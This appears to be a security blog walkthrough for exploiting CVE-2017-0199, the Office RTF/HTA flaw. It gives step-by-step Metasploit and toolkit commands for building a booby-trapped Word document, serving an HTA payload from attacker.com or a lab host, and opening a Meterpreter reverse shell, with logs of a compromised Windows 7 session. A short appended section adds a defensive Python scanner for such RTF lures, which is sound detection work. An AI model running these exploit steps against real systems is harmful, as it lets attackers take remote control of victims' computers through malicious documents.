0x01 Via Metasploit
Preparation
Update MSF to the latest version.
Download the corresponding exploit module
cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb
Download the RTF template file
cd /usr/share/metasploit-framework/data/exploits
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf
Start the HTA server
msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Powershell x86

msf exploit(hta_server) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.14.81.6:4444
[*] Using URL: http://0.0.0.0:8080/5Fzi0vL.hta
[*] Local IP: http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(hta_server) > [*] Server started.
msf exploit(hta_server) >
Generate the payload document
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options

Module options (exploit/windows/fileformat/office_word_hta):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   FILENAME                                no        The file name.
   TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word

msf exploit(office_word_hta) > set TARGETURI http://10.14.81.6:8080/5Fzi0vL.hta
TARGETURI => http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run
[+] msf.doc stored at /root/.msf4/local/msf.doc
msf exploit(office_word_hta) >
Copy the generated msf.doc to the Windows machine; opening it is enough to obtain a session.
msf exploit(office_word_hta) >
[*] 10.14.89.247     hta_server - Delivering Payload
[*] 10.14.89.247     hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:10576) at 2017-04-19 21:58:03 +0800
msf exploit(office_word_hta) > sessions -i

Active sessions
===============

  Id  Type                     Information       Connection
  --  ----                     -----------       ----------
  1   meterpreter x86/windows  hp-PC\hp @ HP-PC  10.14.81.6:4444 -> 10.14.89.247:10576 (10.14.89.247)

msf exploit(office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
0x02 Via the Toolkit
Preparation
Download the Toolkit.
Generate the payload document
python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Generate the meterpreter payload and start the handler
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
Start the HTA server
python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Once the victim opens the document, a shell comes back.
[*] Started reverse TCP handler on 10.14.81.6:4444
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:12775) at 2017-04-19 23:09:03 +0800

meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > screenshot
[-] stdapi_ui_desktop_screenshot: Operation failed: Access is denied.
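Both procedures above (the Metasploit module and the Toolkit) produce an RTF document whose linked OLE object is updated on open and fetches a remote HTA. As an added example from the defender's side, not code from the original page, Metasploit or the Toolkit, the scanner below flags RTF files of that shape: it checks for the `\objautlink` and `\objupdate` control words, decodes each `\objdata` hex stream and looks inside for the URL Moniker class id and an embedded URL. The sample RTF is constructed for the test and is not a working exploit; its header bytes and layout are simplified assumptions rather than a real OLE stream.

```python
import re

# Little-endian byte form of the URL Moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B};
# a linked OLE object that resolves its content from a URL carries this class id.
URL_MONIKER_CLSID = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")

def extract_objdata(rtf: bytes) -> list:
    """Decode every {\\*\\objdata <hex>} group in an RTF file into raw bytes."""
    blobs = []
    for m in re.finditer(rb"\\\*\\objdata\s*([0-9A-Fa-f\s]+)", rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:            # tolerate a truncated trailing nibble
            hexdata = hexdata[:-1]
        try:
            blobs.append(bytes.fromhex(hexdata.decode("ascii")))
        except ValueError:
            continue                     # not valid hex, skip this object
    return blobs

def find_urls(blob: bytes) -> list:
    """Return http(s) URLs in a decoded object stream, stored as ASCII or UTF-16LE."""
    urls = [m.group(0).decode("ascii") for m in re.finditer(rb"https?://[\x21-\x7e]+", blob)]
    wide = rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+"
    urls += [m.group(0).decode("utf-16-le") for m in re.finditer(wide, blob)]
    return urls

def scan_rtf(rtf: bytes) -> dict:
    """Flag an RTF that carries an auto-updating linked object pointing at a URL."""
    f = {"objautlink": b"\\objautlink" in rtf, "objupdate": b"\\objupdate" in rtf,
         "url_moniker": False, "urls": []}
    for blob in extract_objdata(rtf):
        f["url_moniker"] |= URL_MONIKER_CLSID in blob
        f["urls"] += find_urls(blob)
    # Update-on-open plus a remote link (moniker or an .hta URL) is the lure shape.
    f["suspicious"] = f["objupdate"] and (
        f["url_moniker"] or any(u.lower().endswith(".hta") for u in f["urls"]))
    return f

def build_sample() -> bytes:
    """Constructed lure-shaped fragment for testing only; not a working exploit file.
    The header bytes and layout are simplified assumptions, not a real OLE stream."""
    stream = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + URL_MONIKER_CLSID
              + "http://10.14.81.6:8080/5Fzi0vL.hta".encode("utf-16-le") + b"\x00\x00")
    return (b"{\\rtf1{\\object\\objautlink\\objupdate\\rsltpict{\\*\\objclass Word.Document.8}"
            b"{\\*\\objdata " + stream.hex().encode("ascii") + b"}}}")

if __name__ == "__main__":
    print(scan_rtf(build_sample()))
```

A benign embedded object (`\objemb` with no `\objupdate`) is not flagged, so the check can run on a mail gateway or sandbox intake without tripping on ordinary documents.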